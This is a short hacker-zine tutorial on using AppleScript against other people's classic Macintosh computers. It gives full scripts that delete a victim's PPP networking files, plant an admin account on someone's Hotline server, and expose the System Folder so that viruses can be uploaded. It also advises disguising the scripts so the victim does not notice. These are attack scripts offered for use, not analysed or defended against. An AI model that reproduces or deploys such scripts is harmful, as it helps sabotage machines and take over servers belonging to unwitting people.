HappleScript Hacking with AppleScript Introduction AppleScript is a wonderful tool for whatever the job is, from organizing your desktop to hacking people's computers. To succesfully do what is described here you will need the following two things: AppleScript - Which comes fully equipped on any Macintosh Hotline - recommended but not required. A little background: For those of you who don't know, AppleScript is a scripting language for Apple Macintosh computers. It lets you do anything from shortcuts to making small applications. What you use to create shortcuts and applications is the script editor which is in the apple extras folder of your hard drive usually. For these applescripts below to work, just copy them into the script editor. Then save them as read only. Your script editor window should look something like this:   Note - For the rest of these examples you need to save the applescript as read only. Or else the victim will know what is going on. Some examples There are billions of fun things to do with AppleScript but for now I will just list a few. 1) --Erase their internet extensions-- Tell application "finder" move file "PPP" of folder "Extensions" of folder "System Folder" of startup disk to trash End tell Tell application "Finder" Clean up trash End tell Tell application "Finder" move file "Config PPP" of folder "Control Panels" of folder "System Folder" of startup disk End tell Tell application "Finder" Clean up trash End tell 2) --Hotline Full admin access-- About - For this to work you need to upload two things to someone's server. One, a saved user file with full admin access. Let's call this saved file "Jerry." And you need this applescript; it is a good idea to rename it and change the icon. Applescript is subject to change according to how the person's server is set up. Tell application "finder" move file "Jerry" of folder "Uploads" of folder "Files" of folder "Server folder"of folder "Hotline Server" of startup disk to folder "Users" of folder "Server folder" of folder "Hotline Server" of startup disk End tell You might need to ask the person where the Hotline server folder is located. It is usually located in his hard drive aka startup disk. Until later, when I find out how to make applescript find things then move them, this is the only technique I can think of. 3) --If you really want to screw with someone using hotline-- tell application "Finder" activate select folder "System Folder" of startup disk make new alias file to selection at startup disk select file "System Folder alias" of startup disk move selection to folder "Files" of folder "Server Folder" of folder "Hotline Server" of folder "Hotline" of startup disk set «class » of file "System Folder Uploads" of folder "Files" of folder "Server Folder" of folder "Hotline Server" of startup disk to "System Folder Uploads" end tell This little happlescript will make an alias of the System folder and place it in the hotline files folder then rename it System Folder Uploads so that you can upload viruses and such, if you want. More Foolproof teqniques will be in the next issue. $ $ ## ## $ $ # # # # $$$$ # # # $ $ # # $ $ ACK # # AC |***********************| e-mail- | Happle@mindspring.com | '***********************'